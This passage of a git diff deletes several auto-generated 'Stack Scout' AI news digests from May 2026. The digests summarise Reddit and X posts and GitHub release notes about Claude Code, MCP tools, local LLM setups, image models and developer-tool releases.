But now I can't disconnect from the local server.](https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time? - ---- - -## [Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…](https://x.com/HudBeer/status/2050622456436818111) -*X / @hudbeer* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins. - ---- - -## [Weekly Meal Planning Fully Automated with Claude and Migros MCP](https://x.com/hslu_aiml/status/2049100936287498456) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end. 
- ---- - -## [@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement](https://x.com/ValsAI/status/2050240263420072446) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index. - ---- - -## [I built "Semvec": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)](https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: mcp, agent_tool - -> Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \- Constant-size compressed context: Token-reduced LLM context that stops growing. \- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs… - ---- - -## [The OpenAI Prompting Guide Has Been Updated. 
🙌🏻 Check It Out 👏🏻](https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/) -*Reddit r/ChatGPT* | 02/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻 - ---- - -## [I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]](https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo) - ---- - -## [Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…](https://x.com/genondemand3d/status/2050539325763293222) -*X / @genondemand3d* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow - ---- - -## [xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. 
The release emphasizes real-tim…](https://x.com/mehedi_u/status/2050462001571504588) -*X / @mehedi_u* | 02/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building - ---- - -## [Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It](https://x.com/aakashgupta/status/2050349093969694825) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition. - ---- - -## [Pika Just Let You Give Claude a Face and Make Videos Through Conversation](https://x.com/pika_labs/status/2050294291998933455) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access. - ---- - -## [NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize](https://x.com/NVIDIAAI/status/2050336285428998202) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability. 
- ---- - diff --git a/data/digest-2026-05-03.md b/data/digest-2026-05-03.md deleted file mode 100644 index e865486..0000000 --- a/data/digest-2026-05-03.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-03** | 15 stories | Auto-generated from 379 archived stories - ---- - -## [EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.](https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> • Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 [https://github.com/kigy1/EasyUI] - ---- - -## [Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community](https://x.com/Shaughnessy119/status/2042339593647800404) -*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability. 
- ---- - -## [Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags](https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> \--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think. - ---- - -## [OpenClaw v2026.5.2 released](https://github.com/openclaw/openclaw/releases/tag/v2026.5.2) -*GitHub Releases · OpenClaw* | 03/05/2026 | Score: 0.91 -Tags: developer_tool, cli_tool - -> ### Highlights - External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc. - Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs. 
- Control UI and WebChat are more resilient across - ---- - -## [pnpm v11.0.4 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.4) -*GitHub Releases · pnpm* | 03/05/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ## Patch Changes * Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427). * Remove pnpm's workspace state file when cleaning node\_modules so `pnpm ci` performs a fresh install after the clean step. * Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`. - ---- - -## [Turbo v2.9.8 released](https://github.com/vercel/turborepo/releases/tag/v2.9.8) -*GitHub Releases · Turbo* | 03/05/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ## What's Changed ### @turbo/repository * chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636 ### Changelog * release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679 * test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681 * docs: Clarify root task guidance by @anthon - ---- - -## [Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31](https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory) -*Hugging Face Blog* | Score: 1.00 -Tags: open_source - ---- - -## [Built this over the weekend because dataset prep was annoying af](https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. 
Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. 
You’ll… - ---- - -## [I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph](https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\"Zen Mode\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442… - ---- - -## [Can I ask a noob question?](https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. 
I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you. - ---- - -## [Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT](https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: cli_tool - -> Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\_K\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\_K\_M: 134 tok/s decode (llama.cpp does \~129) * Mistral-7B: 132 tok/s (llama.cpp \~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup. - ---- - -## [Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)](https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). 
Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**… - ---- - -## [@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged](https://x.com/Scobleizer/status/2050740859789103142) -*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 -Tags: product_launch - -> Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand. - ---- - -## [What if ChatGPT launched in 1998](https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/) -*Reddit r/ChatGPT* | 03/05/2026 | Score: 1.00 -Tags: tool_update - -> Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️ - ---- - -## [Set up multi-agent orchestration with Claude Code as the boss... 
am I overcomplicating this?](https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/) -*Reddit r/ClaudeAI* | 03/05/2026 | Score: 1.00 -Tags: cli_tool - -> Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for "review your own diff with fresh eyes" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. 
Because with work I have the two accoun… - ---- - diff --git a/data/digest-2026-05-04.md b/data/digest-2026-05-04.md deleted file mode 100644 index 8b98428..0000000 --- a/data/digest-2026-05-04.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-04** | 15 stories | Auto-generated from 617 archived stories - ---- - -## [Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)](https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, tool_update - -> A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to "what would break if I delete this function." We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. 
(Disclosure: I am part of the team behind it… - ---- - -## [claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config](https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool - -> Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into "rewrite all the plugins" or "do without." claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \`claude\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \`claude\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over… - ---- - -## [Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! 
In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…](https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update - -> https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e… - ---- - -## [Top 6 Claude Skills: 15th April to 3rd May](https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. 
Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur" playbook cost-based, value-bas… - ---- - -## [built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing](https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking "wait, what shape did the user object end up as?", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. 
Works for broadcasts too, like "ask everyone what they're working on", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I… - ---- - -## [Your Claude Code agent is always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.](https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 0.99 -Tags: api_update, agent_tool - -> Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to "remind itself" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking "what does getUserById return?" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. 
Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r… - ---- - -## [ChatGPT’s fixation on my past conversations has made it borderline unusable](https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/) -*Reddit r/ChatGPT* | 04/05/2026 | Score: 0.96 -Tags: github_release, tool_update - -> in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. 
its like a new version of the “people pleasing“ that we were all griping about… - ---- - -## [Turbo v2.9.9 released](https://github.com/vercel/turborepo/releases/tag/v2.9.9) -*GitHub Releases · Turbo* | 04/05/2026 | Score: 0.92 -Tags: github_release, tool_update - -> ## What's Changed ### Changelog * release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700 * fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699 * release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705 * fix: Scope repo index prefixes to Git root by @anthonyshew - ---- - -## [pnpm v11.0.5 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.5) -*GitHub Releases · pnpm* | 04/05/2026 | Score: 0.92 -Tags: github_release, cli_tool - -> ## Patch Changes * Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS - ---- - -## [A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.](https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/) -*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 -Tags: open_source - -> A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo. 
- ---- - -## [Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live](https://x.com/peaq/status/2051288009081782473) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: tool_update - -> peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore. - ---- - -## [AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures](https://x.com/WesRoth/status/2051300819878936591) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: developer_tool - -> An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery. - ---- - -## [Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor](https://x.com/ericzakariasson/status/2051255780167610522) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: cli_tool - -> The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness. 
- ---- - -## [Ace-Step-1.5-Api-server-UI](https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/) -*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 -Tags: api_update - -> [Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support - ---- - -## [Meta Abandons Open Source — Days After LlamaCon](https://x.com/thenewstack/status/2050017453615301067) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: open_source - -> Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community. - ---- - diff --git a/data/digest-2026-05-05.md b/data/digest-2026-05-05.md deleted file mode 100644 index d14aac4..0000000 --- a/data/digest-2026-05-05.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-05** | 15 stories | Auto-generated from 540 archived stories - ---- - -## [torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. 
